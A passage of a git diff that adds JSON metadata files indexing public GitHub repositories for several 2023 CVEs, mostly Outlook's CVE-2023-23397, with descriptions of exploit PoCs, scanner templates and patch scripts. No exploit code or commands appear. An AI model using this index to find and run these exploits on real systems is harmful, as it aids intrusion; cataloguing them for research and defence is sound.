"full_name": "Mr-xn\/CVE-2023-23333", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2023-23333", + "description": "SolarView Compact through 6.00 downloader.php commands injection (RCE) nuclei-templates", + "fork": false, + "created_at": "2023-06-16T14:33:31Z", + "updated_at": "2024-06-21T00:11:12Z", + "pushed_at": "2023-06-16T14:40:00Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 673443044, + "name": "nmap-CVE-2023-23333-exploit", + "full_name": "emanueldosreis\/nmap-CVE-2023-23333-exploit", + "owner": { + "login": "emanueldosreis", + "id": 5330737, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5330737?v=4", + "html_url": "https:\/\/github.com\/emanueldosreis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emanueldosreis\/nmap-CVE-2023-23333-exploit", + "description": "Nmap NSE script to dump \/ test Solarwinds CVE-2023-23333 vulnerability", + "fork": false, + "created_at": "2023-08-01T16:24:37Z", + "updated_at": "2024-06-06T21:51:33Z", + "pushed_at": "2023-08-01T16:36:49Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23388.json b/2023/CVE-2023-23388.json new file mode 100644 index 0000000000..839cdee530 --- /dev/null +++ b/2023/CVE-2023-23388.json @@ -0,0 +1,33 @@ +[ + { + "id": 819107258, + "name": "CVE-2023-23388", + "full_name": "ynwarcs\/CVE-2023-23388", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2023-23388", + "description": "poc for CVE-2023-23388 (LPE in Windows 10\/11 bthserv service)", + "fork": false, + "created_at": "2024-06-23T19:52:09Z", + "updated_at": "2024-11-15T18:06:59Z", + "pushed_at": "2024-07-17T12:25:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23396.json b/2023/CVE-2023-23396.json new file mode 100644 index 0000000000..d18baa8bab --- /dev/null +++ b/2023/CVE-2023-23396.json @@ -0,0 +1,53 @@ +[ + { + "id": 614972218, + "name": "CVE-2023-23396", + "full_name": "LucaBarile\/CVE-2023-23396", + "owner": { + "login": "LucaBarile", + "id": 74877659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4", + "html_url": "https:\/\/github.com\/LucaBarile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2023-23396", + "description": "Exploit and report for CVE-2023-23396.", + "fork": false, + "created_at": "2023-03-16T17:28:27Z", + "updated_at": "2023-08-17T12:00:39Z", + "pushed_at": "2023-04-07T12:03:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23396", + "denial-of-service", + "disclosure", + "excel-exploit", + "exploit", + "full-disclosure", + "kb5002356", + "kb5002362", + "microsoft-excel", + "office-365", + "paper", + "poc", + "proof-of-concept", + "report", + "vulnerability", + "vulnerability-disclosure", + "white-paper", + "write-up", + "writeup" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-23397.json b/2023/CVE-2023-23397.json new file mode 100644 index 0000000000..549a8c3379 --- /dev/null +++ b/2023/CVE-2023-23397.json @@ -0,0 +1,919 @@ +[ + { + "id": 614479263, + "name": "CVE-2023-23397_EXPLOIT_0DAY", + "full_name": "sqrtZeroKnowledge\/CVE-2023-23397_EXPLOIT_0DAY", + "owner": { + "login": "sqrtZeroKnowledge", + "id": 31594437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31594437?v=4", + "html_url": "https:\/\/github.com\/sqrtZeroKnowledge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sqrtZeroKnowledge\/CVE-2023-23397_EXPLOIT_0DAY", + "description": "Exploit for the CVE-2023-23397", + "fork": false, + "created_at": "2023-03-15T17:03:38Z", + "updated_at": "2024-09-02T05:24:27Z", + "pushed_at": "2023-03-15T17:53:53Z", + "stargazers_count": 158, + "watchers_count": 158, + "has_discussions": false, + "forks_count": 45, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 45, + "watchers": 158, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 614826916, + "name": "CVE-2023-23397", + "full_name": "j0eyv\/CVE-2023-23397", + "owner": { + "login": "j0eyv", + "id": 41282854, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41282854?v=4", + "html_url": "https:\/\/github.com\/j0eyv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j0eyv\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-03-16T12:02:04Z", + "updated_at": "2023-03-16T15:18:48Z", + "pushed_at": "2023-03-16T12:04:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614882571, + "name": "CVE-2023-23397", + "full_name": "alicangnll\/CVE-2023-23397", + "owner": { + "login": "alicangnll", + "id": 23417905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23417905?v=4", + "html_url": "https:\/\/github.com\/alicangnll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alicangnll\/CVE-2023-23397", + "description": "CVE-2023-23397 - Microsoft Outlook Vulnerability", + "fork": false, + "created_at": "2023-03-16T14:07:15Z", + "updated_at": "2024-08-12T20:30:17Z", + "pushed_at": "2023-03-17T09:46:17Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614908297, + "name": "CVE-2023-23397", + "full_name": "grn-bogo\/CVE-2023-23397", + "owner": { + "login": "grn-bogo", + "id": 20979467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20979467?v=4", + "html_url": "https:\/\/github.com\/grn-bogo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grn-bogo\/CVE-2023-23397", + "description": "Python script to create a message with the vulenrability properties set", + "fork": false, + "created_at": "2023-03-16T15:00:26Z", + "updated_at": "2023-03-22T01:01:56Z", + "pushed_at": "2023-03-16T15:02:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615010757, + "name": "CVE-2023-23397", + "full_name": "ka7ana\/CVE-2023-23397", + "owner": { + "login": "ka7ana", + "id": 5593452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5593452?v=4", + "html_url": "https:\/\/github.com\/ka7ana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ka7ana\/CVE-2023-23397", + "description": "Simple PoC in PowerShell for CVE-2023-23397", + "fork": false, + "created_at": "2023-03-16T19:10:37Z", + "updated_at": "2024-03-14T15:24:06Z", + "pushed_at": "2023-03-16T19:29:49Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23397", + "infosec", + "outlook", + "poc", + "powershell", + "powershell-script", + "proof-of-concept", + "vulnerability", + "windows" + ], + "visibility": "public", + "forks": 11, + "watchers": 41, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 615021806, + "name": "CVE-2023-23397-POC-Powershell", + "full_name": "api0cradle\/CVE-2023-23397-POC-Powershell", + "owner": { + "login": "api0cradle", + "id": 12997471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12997471?v=4", + "html_url": "https:\/\/github.com\/api0cradle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/api0cradle\/CVE-2023-23397-POC-Powershell", + "description": null, + "fork": false, + "created_at": "2023-03-16T19:43:39Z", + "updated_at": "2024-12-26T11:47:54Z", + "pushed_at": "2023-03-17T07:47:40Z", + "stargazers_count": 341, + "watchers_count": 341, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 64, + "watchers": 341, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 615147191, + "name": "CVE-2023-23397", + "full_name": "im007\/CVE-2023-23397", + "owner": { + "login": "im007", + "id": 33734981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33734981?v=4", + "html_url": "https:\/\/github.com\/im007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im007\/CVE-2023-23397", + "description": "CVE-2023-23397 Remediation Script (Powershell)", + "fork": false, + "created_at": "2023-03-17T03:38:50Z", + "updated_at": "2023-03-17T03:43:08Z", + "pushed_at": "2023-03-17T18:56:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615197592, + "name": "CVE-2023-23397-PoC-PowerShell", + "full_name": "cleverg0d\/CVE-2023-23397-PoC-PowerShell", + "owner": { + "login": "cleverg0d", + "id": 108401157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4", + "html_url": "https:\/\/github.com\/cleverg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2023-23397-PoC-PowerShell", + "description": "PoC for CVE-2023-23397", + "fork": false, + "created_at": "2023-03-17T06:52:42Z", + "updated_at": "2023-03-27T17:45:53Z", + "pushed_at": "2023-03-17T07:36:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615270045, + "name": "CVE-2023-23397-POC", + "full_name": "ahmedkhlief\/CVE-2023-23397-POC", + "owner": { + "login": "ahmedkhlief", + "id": 24752712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24752712?v=4", + "html_url": "https:\/\/github.com\/ahmedkhlief", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmedkhlief\/CVE-2023-23397-POC", + "description": "Exploit POC for CVE-2023-23397", + "fork": false, + "created_at": "2023-03-17T10:18:26Z", + "updated_at": "2023-07-19T08:51:01Z", + "pushed_at": "2023-03-17T12:58:55Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615437537, + "name": "CVE-2023-23397_EXPLOIT", + "full_name": "BillSkiCO\/CVE-2023-23397_EXPLOIT", + "owner": { + "login": "BillSkiCO", + "id": 11514515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11514515?v=4", + "html_url": "https:\/\/github.com\/BillSkiCO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BillSkiCO\/CVE-2023-23397_EXPLOIT", + "description": "Generates meeting requests taking advantage of CVE-2023-23397. This requires the outlook thick client to send.", + "fork": false, + "created_at": "2023-03-17T17:35:14Z", + "updated_at": "2024-10-21T05:41:44Z", + "pushed_at": "2023-03-17T19:19:00Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 615848571, + "name": "CVE-2023-23397-PoC", + "full_name": "djackreuter\/CVE-2023-23397-PoC", + "owner": { + "login": "djackreuter", + "id": 27731554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27731554?v=4", + "html_url": "https:\/\/github.com\/djackreuter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/djackreuter\/CVE-2023-23397-PoC", + "description": null, + "fork": false, + "created_at": "2023-03-18T21:14:21Z", + "updated_at": "2024-01-02T19:38:28Z", + "pushed_at": "2023-03-18T21:24:56Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 615855021, + "name": "CVE-2023-23397", + "full_name": "moneertv\/CVE-2023-23397", + "owner": { + "login": "moneertv", + "id": 67332723, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67332723?v=4", + "html_url": "https:\/\/github.com\/moneertv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/moneertv\/CVE-2023-23397", + "description": "CVE-2023-23397 C# PoC ", + "fork": false, + "created_at": "2023-03-18T21:44:46Z", + "updated_at": "2023-07-19T08:15:31Z", + "pushed_at": "2023-03-18T21:49:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 615967703, + "name": "CVE-2023-23397-POC-Using-Interop-Outlook", + "full_name": "ahmedkhlief\/CVE-2023-23397-POC-Using-Interop-Outlook", + "owner": { + "login": "ahmedkhlief", + "id": 24752712, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24752712?v=4", + "html_url": "https:\/\/github.com\/ahmedkhlief", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmedkhlief\/CVE-2023-23397-POC-Using-Interop-Outlook", + "description": null, + "fork": false, + "created_at": "2023-03-19T08:07:58Z", + "updated_at": "2023-03-19T20:10:03Z", + "pushed_at": "2023-03-19T08:10:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616567479, + "name": "CVE-2023-23397", + "full_name": "Trackflaw\/CVE-2023-23397", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2023-23397", + "description": "Simple PoC of the CVE-2023-23397 vulnerability with the payload sent by email.", + "fork": false, + "created_at": "2023-03-20T16:31:54Z", + "updated_at": "2024-11-09T05:34:42Z", + "pushed_at": "2023-03-24T10:46:38Z", + "stargazers_count": 123, + "watchers_count": 123, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-23397" + ], + "visibility": "public", + "forks": 27, + "watchers": 123, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 616598036, + "name": "CVE-2023-23397", + "full_name": "SecCTechs\/CVE-2023-23397", + "owner": { + "login": "SecCTechs", + "id": 128412391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128412391?v=4", + "html_url": "https:\/\/github.com\/SecCTechs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecCTechs\/CVE-2023-23397", + "description": "Patch for MS Outlook Critical Vulnerability - CVSS 9.8", + "fork": false, + "created_at": "2023-03-20T17:45:37Z", + "updated_at": "2023-03-29T13:38:43Z", + "pushed_at": "2023-03-20T17:55:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617122203, + "name": "CVE-2023-23397", + "full_name": "tiepologian\/CVE-2023-23397", + "owner": { + "login": "tiepologian", + "id": 4747002, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4747002?v=4", + "html_url": "https:\/\/github.com\/tiepologian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tiepologian\/CVE-2023-23397", + "description": "Proof of Concept for CVE-2023-23397 in Python", + "fork": false, + "created_at": "2023-03-21T18:38:00Z", + "updated_at": "2023-12-19T03:04:22Z", + "pushed_at": "2023-03-21T18:43:50Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617419137, + "name": "cve-2023-23397", + "full_name": "BronzeBee\/cve-2023-23397", + "owner": { + "login": "BronzeBee", + "id": 16874131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16874131?v=4", + "html_url": "https:\/\/github.com\/BronzeBee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BronzeBee\/cve-2023-23397", + "description": "Python script for sending e-mails with CVE-2023-23397 payload using SMTP", + "fork": false, + "created_at": "2023-03-22T11:00:47Z", + "updated_at": "2024-09-17T14:09:06Z", + "pushed_at": "2023-03-22T12:38:26Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617968206, + "name": "CVE-2023-23397", + "full_name": "stevesec\/CVE-2023-23397", + "owner": { + "login": "stevesec", + "id": 80222096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80222096?v=4", + "html_url": "https:\/\/github.com\/stevesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stevesec\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-03-23T13:40:18Z", + "updated_at": "2023-03-23T13:41:23Z", + "pushed_at": "2023-03-23T14:04:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618584783, + "name": "CVE-2023-23397-Report", + "full_name": "Cyb3rMaddy\/CVE-2023-23397-Report", + "owner": { + "login": "Cyb3rMaddy", + "id": 61891953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61891953?v=4", + "html_url": "https:\/\/github.com\/Cyb3rMaddy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyb3rMaddy\/CVE-2023-23397-Report", + "description": "An exploitation demo of Outlook Elevation of Privilege Vulnerability", + "fork": false, + "created_at": "2023-03-24T19:47:42Z", + "updated_at": "2024-12-08T08:26:48Z", + "pushed_at": "2023-03-24T19:51:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 618586824, + "name": "CVE-2023-23397-Patch", + "full_name": "Zeppperoni\/CVE-2023-23397-Patch", + "owner": { + "login": "Zeppperoni", + "id": 63176507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63176507?v=4", + "html_url": "https:\/\/github.com\/Zeppperoni", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zeppperoni\/CVE-2023-23397-Patch", + "description": "CVE-2023-23397 powershell patch script for Windows 10 and 11 ", + "fork": false, + "created_at": "2023-03-24T19:54:21Z", + "updated_at": "2023-03-24T20:21:42Z", + "pushed_at": "2023-03-24T20:50:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 620585634, + "name": "CVE-2023-23397", + "full_name": "jacquesquail\/CVE-2023-23397", + "owner": { + "login": "jacquesquail", + "id": 4651543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4651543?v=4", + "html_url": "https:\/\/github.com\/jacquesquail", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jacquesquail\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-03-29T01:17:22Z", + "updated_at": "2023-05-04T14:20:15Z", + "pushed_at": "2023-03-29T01:20:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 621625300, + "name": "CVE-2023-23397-POC", + "full_name": "3yujw7njai\/CVE-2023-23397-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-23397-POC", + "description": "CVE-2023-23397漏洞的简单PoC,有效载荷通过电子邮件发送。", + "fork": false, + "created_at": "2023-03-31T03:35:30Z", + "updated_at": "2023-11-06T07:57:19Z", + "pushed_at": "2023-03-31T03:37:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637495980, + "name": "CVE-2023-23397", + "full_name": "vlad-a-man\/CVE-2023-23397", + "owner": { + "login": "vlad-a-man", + "id": 94809865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94809865?v=4", + "html_url": "https:\/\/github.com\/vlad-a-man", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vlad-a-man\/CVE-2023-23397", + "description": "CVE-2023-23397 PoC", + "fork": false, + "created_at": "2023-05-07T18:21:35Z", + "updated_at": "2024-11-12T20:22:46Z", + "pushed_at": "2023-05-07T18:47:36Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 666573953, + "name": "OutlookNTLM_CVE-2023-23397", + "full_name": "Muhammad-Ali007\/OutlookNTLM_CVE-2023-23397", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/OutlookNTLM_CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-07-14T22:02:55Z", + "updated_at": "2024-12-01T08:06:36Z", + "pushed_at": "2023-07-15T11:21:52Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 710229482, + "name": "CVE-2023-23397", + "full_name": "Pushkarup\/CVE-2023-23397", + "owner": { + "login": "Pushkarup", + "id": 148672587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148672587?v=4", + "html_url": "https:\/\/github.com\/Pushkarup", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pushkarup\/CVE-2023-23397", + "description": "This script exploits CVE-2023-23397, a Zero-Day vulnerability in Microsoft Outlook, allowing the generation of malicious emails for testing and educational purposes.", + "fork": false, + "created_at": "2023-10-26T09:26:32Z", + "updated_at": "2024-02-22T17:54:41Z", + "pushed_at": "2023-10-26T10:11:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 736472941, + "name": "CVE-2023-23397", + "full_name": "ducnorth2712\/CVE-2023-23397", + "owner": { + "login": "ducnorth2712", + "id": 112828799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112828799?v=4", + "html_url": "https:\/\/github.com\/ducnorth2712", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ducnorth2712\/CVE-2023-23397", + "description": null, + "fork": false, + "created_at": "2023-12-28T02:20:57Z", + "updated_at": "2023-12-28T02:20:58Z", + "pushed_at": "2023-12-28T02:20:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753987117, + "name": "CVE-2023-23397-POC", + "full_name": "sarsaeroth\/CVE-2023-23397-POC", + "owner": { + "login": "sarsaeroth", + "id": 159212133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/159212133?v=4", + "html_url": "https:\/\/github.com\/sarsaeroth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sarsaeroth\/CVE-2023-23397-POC", + "description": "C implementation of Outlook 0-click vulnerability", + "fork": false, + "created_at": "2024-02-07T07:08:55Z", + "updated_at": "2024-02-07T07:08:55Z", + "pushed_at": "2024-02-07T07:08:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 774844975, + "name": "CVE-2023-23397-PoW", + "full_name": "TheUnknownSoul\/CVE-2023-23397-PoW", + "owner": { + "login": "TheUnknownSoul", + "id": 58050201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58050201?v=4", + "html_url": "https:\/\/github.com\/TheUnknownSoul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheUnknownSoul\/CVE-2023-23397-PoW", + "description": "Proof of Work of CVE-2023-23397 for vulnerable Microsoft Outlook client application.", + "fork": false, + "created_at": "2024-03-20T09:49:01Z", + "updated_at": "2024-03-20T10:39:45Z", + "pushed_at": "2024-03-20T10:39:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploitation", + "hacking", + "msoutlook", + "netntlm", + "smb" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818675920, + "name": "CVE-2023-23397", + "full_name": "Symbolexe\/CVE-2023-23397", + "owner": { + "login": "Symbolexe", + "id": 140549630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140549630?v=4", + "html_url": "https:\/\/github.com\/Symbolexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Symbolexe\/CVE-2023-23397", + "description": "CVE-2023-23397: Remote Code Execution Vulnerability in Microsoft Outlook", + "fork": false, + "created_at": "2024-06-22T14:25:39Z", + "updated_at": "2024-06-22T14:27:16Z", + "pushed_at": "2024-06-22T14:27:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git 